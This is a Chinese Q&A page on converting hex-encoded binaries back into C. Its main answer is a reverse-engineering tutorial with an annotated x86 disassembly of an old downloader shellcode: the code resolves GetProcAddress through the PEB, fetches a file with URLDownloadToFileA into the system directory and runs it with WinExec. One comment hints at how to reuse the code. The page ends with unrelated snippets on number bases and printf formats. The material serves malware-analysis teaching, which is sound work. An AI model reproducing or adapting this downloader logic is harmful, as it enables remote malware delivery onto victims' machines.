十六进制编码的c语言是怎样的
文件有两种,一种是文本文件,一种是程序二进制文件,不管哪种文件都可以用十六进制编码来显示,称为hex文件。
1、文本Hex文件一般不需要转成C语言,更多的是程序二进制文件,用十六进制显示,可以转换成C语言,一般使用相应的反汇编程序来实现,这方面的工具很多,不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA,Linux平台使用最多的是GDB和Linux版的IDA。
OllyDbg,简称OD,一般是软件逆向工程爱好者,最先使用的一个工具,但是因为当下不在更新,所以一般用一般用于学习使用,下图中左上角的区域即为反汇编区域 ,用户可以根据汇编指令,分析程序算法,然后自己编写代码。
在Windows平台,特别是x64平台,最好用的反汇编工具除还得是Windbg。将程序载入Windbg后,可以输入u命令来查看程序的反汇编代码。
2、对于编程人员来说,逆向分析是一个基本的技能,但是往往不容易入门,这里举一个例子。以一段早些年ShellCode的十六进制代码为例,代码如下图所示,这段不起眼的代码,实际上实现了一个下载者的功能。
拿到这样的十六进制代码,一般来说,先将其生成二进制文件,然后再分析其指令,通过反汇编指令再写出源码。只需要将上面的十六进制代码,保存到C语言的字符串数组中,写入到一个Exe的文件空段中,再修改指令将其跳转到程序入口处即可,这个过程类似于软件安全领域的壳。
将十六进制代码写入一个exe文件后,就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析,两者的不同在于动态调试器是要运行程序的,而静态反汇编分析不需要运行程序,所以一般恶意程序,都采用静态分析。反汇编开头的一段十六进制代码注释如下:
4AD75021 5A pop edx ; 函数返回的地址保存到edx中
4AD75022 64:A1 30000000 mov eax, dword ptr fs:[30] ; 取peb
4AD75028 8B40 0C mov eax, dword ptr [eax+C] ; peb_link
4AD7502B 8B70 1C mov esi, dword ptr [eax+1C] ; 初始化列表到esi
4AD7502E AD lods dword ptr [esi] ; [esi]->eax + 8的位置即kernel32.dll的地址
4AD7502F 8B40 08 mov eax, dword ptr [eax+8] ; eax=kernel32.dll的地址
4AD75032 8BD8 mov ebx, eax ; ebx=kernel32.dll的基址
4AD75034 8B73 3C mov esi, dword ptr [ebx+3C] ; esi = pe头偏移
4AD75037 8B741E 78 mov esi, dword ptr [esi+ebx+78] ; esi为kernel32.dll导出表的偏移
4AD7503B 03F3 add esi, ebx ; esi = kernel32.dll导出表的虚拟地址
4AD7503D 8B7E 20 mov edi, dword ptr [esi+20] ; edi=ent的偏移地址
4AD75040 03FB add edi, ebx ; edi = ent的虚拟地址
4AD75042 8B4E 14 mov ecx, dword ptr [esi+14] ; ecx = kernel32.dll导出地址的个数
4AD75045 33ED xor ebp, ebp ; ebp=0
4AD75047 56 push esi ; 保存导出表虚拟地址
4AD75048 57 push edi ; 保存ent虚拟地址
4AD75049 51 push ecx ; 保存计数
4AD7504A 8B3F mov edi, dword ptr [edi]
4AD7504C 03FB add edi, ebx ; 定位ent中的函数名
4AD7504E 8BF2 mov esi, edx ; esi为 要查询的函数GetProcAddress即该call的下一个地址是数据
4AD75050 6A 0E push 0E ; 0xe0是GetProcAddress函数的字符个数
4AD75052 59 pop ecx ; 设置循环次数为 0xe
4AD75053 F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi] ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress
4AD75055 74 08 je short 4AD7505F ; 如果ENT中的函数名为GetProcAddress跳走
4AD75057 59 pop ecx ; 不相等则将导出地址数出栈
4AD75058 5F pop edi ; ent虚拟地址出栈
4AD75059 83C7 04 add edi, 4 ; edi地址递增4字节 因为ENT的元素大小为4字节
4AD7505C 45 inc ebp ; ebp用于保存ent中定位到GetProcAddress函数时的计数
4AD7505D ^ E2 E9 loopd short 4AD75048 ; 循环查询
4AD7505F 59 pop ecx
4AD75060 5F pop edi
4AD75061 5E pop esi
4AD75062 8BCD mov ecx, ebp ; 计数保存于ecx
4AD75064 8B46 24 mov eax, dword ptr [esi+24] ; esi+0x24 Ordinal序号表偏移地址
4AD75067 03C3 add eax, ebx ; ordinal序号表的虚拟地址
4AD75069 D1E1 shl ecx, 1 ; ecx逻辑增加2倍 因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍
4AD7506B 03C1 add eax, ecx
4AD7506D 33C9 xor ecx, ecx ; ecx=0
4AD7506F 66:8B08 mov cx, word ptr [eax] ; 保存取出的ordinal序号
4AD75072 8B46 1C mov eax, dword ptr [esi+1C] ; eax 为kenrnel32.dll的EAT的偏移地址
4AD75075 > 03C3 add eax, ebx ; eax = kernel32.dll的eat虚拟地址
4AD75077 C1E1 02 shl ecx, 2 ; 同上,扩大4倍因为eat中元素为DWORD值
4AD7507A 03C1 add eax, ecx
4AD7507C 8B00 mov eax, dword ptr [eax] ; eax即为GetProcAddress函数的地址 相对虚拟地址,EAT中保存的RVA
4AD7507E 03C3 add eax, ebx ; 与基址相加求得GetProcAddress函数的虚拟地址
4AD75080 8BFA mov edi, edx ; GetProcAddress字符到edi
4AD75082 8BF7 mov esi, edi ; esi保存GetProcAddress地址
4AD75084 83C6 0E add esi, 0E ; esi指向GetProcAddress字符串的末地址
4AD75087 8BD0 mov edx, eax ; edx为GetProcAddress的地址
4AD75089 6A 04 push 4
4AD7508B 59 pop ecx ; ecx=4
有经验的程序员, 通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码:
4AD7508C E8 50000000 call 4AD750E1 ; 设置IAT 得到4个函数的地址
4AD75091 83C6 0D add esi, 0D ; 从这里开始实现ShellCode的真正功能
4AD75094 52 push edx
4AD75095 56 push esi ; urlmon
4AD75096 FF57 FC call dword ptr [edi-4] ; 调用LoadLibrarA来加载urlmon.dll
4AD75099 5A pop edx ; edx = GetProcAddress的地址
4AD7509A 8BD8 mov ebx, eax
4AD7509C 6A 01 push 1
4AD7509E 59 pop ecx
4AD7509F E8 3D000000 call 4AD750E1 ; 再次设置 IAT 得到URLDownLoadToFileA
4AD750A4 83C6 13 add esi, 13 ; esi指向URLDownLoadToFileA的末地址
4AD750A7 56 push esi
4AD750A8 46 inc esi
4AD750A9 803E 80 cmp byte ptr [esi], 80 ; 判断esi是否为0x80 这里在原码中有0x80如果要自己用,应该加上一个字节用于表示程序结束
4AD750AC ^ 75 FA jnz short 4AD750A8 ; 跨过这个跳转,需要在OD中CTRL+E修改数据为0x80
4AD750AE 8036 80 xor byte ptr [esi], 80
4AD750B1 5E pop esi
4AD750B2 83EC 20 sub esp, 20 ; 开辟 32 byte栈空间
4AD750B5 > 8BDC mov ebx, esp ; ebx为栈区的指针
4AD750B7 6A 20 push 20
4AD750B9 53 push ebx
4AD750BA FF57 EC call dword ptr [edi-14] ; 调用GetSystemDirectoryA得到系统目录
4AD750BD C70403 5C612E65 mov dword ptr [ebx+eax], 652E615C ; ebx+0x13 系统路径占 0x13个字节
4AD750C4 C74403 04 78650000 mov dword ptr [ebx+eax+4], 6578 ; 拼接下载后的文件路径%systemroot%\system32\a.exe
4AD750CC 33C0 xor eax, eax
4AD750CE 50 push eax
4AD750CF 50 push eax
4AD750D0 53 push ebx
4AD750D1 56 push esi
4AD750D2 50 push eax
4AD750D3 > FF57 FC call dword ptr [edi-4] ; URLDownLoadToFile下载文件为a.exe
4AD750D6 8BDC mov ebx, esp
4AD750D8 50 push eax
4AD750D9 53 push ebx
4AD750DA FF57 F0 call dword ptr [edi-10] ; WinExec执行代码
4AD750DD 50 push eax
4AD750DE FF57 F4 call dword ptr [edi-C] ; ExitThread退出线程
接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址,并依次执行。到这里实际上有经验的程序员,马上就能写出C语言代码来。 后面的数据区不在分析了,主要是介绍如何操作。
使用C语言,虽然知道了Hex文件的大致流程,但是一般来说,对于汇编指令,更倾向于直接使用asm关键字来使用内联汇编。如下图所示:
通过这个实例 ,相信应该能理解一个大致的流程啦。
c语言的二进制、八进制、十六进制之类的进制是什么意思?举几个例子...
进制---即逢几进一的意思;二进制即逢二进一,八进制即逢八进一,十六进制即逢十六进一如:十进制逢时进一,计数规则为:0、1、2、3、4、5、6、7、8、9;数到10的时候向前进1变为10、11等等二进制是逢二进一,计数规则为0、1,该数到2时向前进1,变为10(对应十进制的2)、11(对应...
C语言中的二进制、十进制、十六进制各是什么意思?
\\x0d\\x0a2进制,用两个阿拉伯数字:0、1; \\x0d\\x0a8进制,用八个阿拉伯数字:0、1、2、3、4、5、6、7; \\x0d\\x0a10进制,用十个阿拉伯数字:0到9; \\x0d\\x0a16进制就是逢16进1,但我们只有0~9这十个数字,所以我们用A,B,C,D,E,F这五个字母来分别表示10,11,12,...
为什么C语言中常量必须是整型的?
因为因为计算机所有信息(包括数据和指令)都是采用二进制编码的(就是说计算机只能识别和执行由来0,1组成的二进制的指自令)。C语言中有编译过程,实际就是把源程序翻译成二进制形式的目标程序。(1)十进制整型常量由一串连续的0~9数字组成。如: 0、120、 365、-12等。(2)八进制整型常量以数字0...
c语言各种数据类型的区别在哪里?能各举一个实例吗?-
声明int变量的格式为:int 变量名;未赋值的int变量创建了存储空间。初始化变量为创建变量并赋值,例如:int num = 10;int类型常量是无小数点和指数的数字,如3、-1。打印int值使用printf("%d", num);。二、八进制与十六进制 八进制和十六进制在C语言中用特定前缀表示,0表示八进制,0x或0X表示...
c语言问答题:字符是如何表示的?
注意这里的编码只能用八进制和十六进制,用八进制时前面加0或不加,用十六进制时前面加x。 比如'\\07'和'\\7'是一样的,是八进制。'\\x7'是十六进制。你的问题里 A、D是第二种表示方法,B、C是第一种表示方法,形式都没错,只有A里使用了八进制编码,就不应该出现8这个数字,所以A错了。
C语言如何输出字符变量的ascii码
例如,`printf("%c",y)`会直接输出字符,`printf("%d",y)`会显示十进制的ASCII码,`printf("%x",y)`为十六进制,而`printf("%o",y)`则是八进制。此外,还可以通过将字符强制转换为整数,如`int(ch)`,来获取ASCII码。下面是一个简单的示例程序:在C语言中,你可以这样操作:首先,定义...
C语言转义字符
字符集为每个字符分配了唯一的编号,即编码值。在C语言中,字符可以用实体表示,同样可以使用编码值表示,这种方式称为转义字符。转义字符以\\或\\x开头,\\后跟八进制编码,\\x后跟十六进制编码。例如,字符1、2、3、a、b、c的ASCII码八进制编码分别为61、62、63、141、142、143,十六进制编码分别为31...
C语言源代码中怎样区分变量和常量
分类: 电脑\/网络 >> 程序设计 >> 其他编程语言 解析:C语言基础知识常量和变量分类:C\/C++ 1.常 量: 程序执行过程中,值不变的量。 3 ,\\'a\\'变 量:值可以改变的量。一个变量有一个名字,在内存中有一定的存储单元,存放变量的值。2.常量类型:a.整 型:12,0,-3 b.实 型:4.6,...
c语言里面 %d是十进制 %o是八进制 %x是十六进制 %多少是二进制
c语言里面没有直接打出二进制数的格式符。C语言中对于不同类型的数据用不同的格式字符。控制printf函数输出格式的是格式字符,printf函数中输出的格式为printf("<格式化字符串>", <参量表>),格式化字符串由格式控制、和输出表列两部分组成,其中格式控制包含格式声明和普通字符。格式声明由“%”和格式...
c语言中的字符编码是多少?
C的ASCII码为67,这个67是以十进制计算的,把十进制的67化成二进制后正好是1000011。在ASCII码表的排列中,字符A到Z,小写a到z,数字0到9,都是按顺序排列的,所以A为65,则B为66,C为67,D为68,E为69。在计算机中,只采用二进制存储数据,这是由存储介质所决定的,在数据存储和读取中,只能...